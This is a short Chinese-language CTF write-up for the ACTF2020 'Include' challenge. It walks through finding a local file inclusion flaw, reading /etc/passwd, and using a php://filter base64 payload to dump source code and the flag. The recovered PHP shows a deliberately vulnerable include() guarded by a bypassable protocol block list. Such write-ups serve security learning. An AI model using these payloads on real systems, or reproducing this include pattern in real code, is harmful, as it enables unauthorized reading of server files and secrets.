[ACTF2020 新生赛]Include
进来只有一个tips的按钮,点一下进入另一个页面,并发现url也发生了变化
看到这个/?file=,输入/file=/etc/passwd测试一下
发现有回显,确定为文件包含漏洞,尝试用伪协议读一下源码,payload:?file=php://filter/convert.base64-encode/resource=index.php
发现base64加密字符串,解密即得源码
<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
exit('hacker!');
}
if($file){
include($file);
}else{
echo '<a href="?file=flag.php">tips</a>';
}
?>
审计代码得知,代码过滤了很多的协议,但是没有过滤我们现在用的这个php://filter,直接尝试看一下flag
又给了一串base64加密字符串,解密即得flag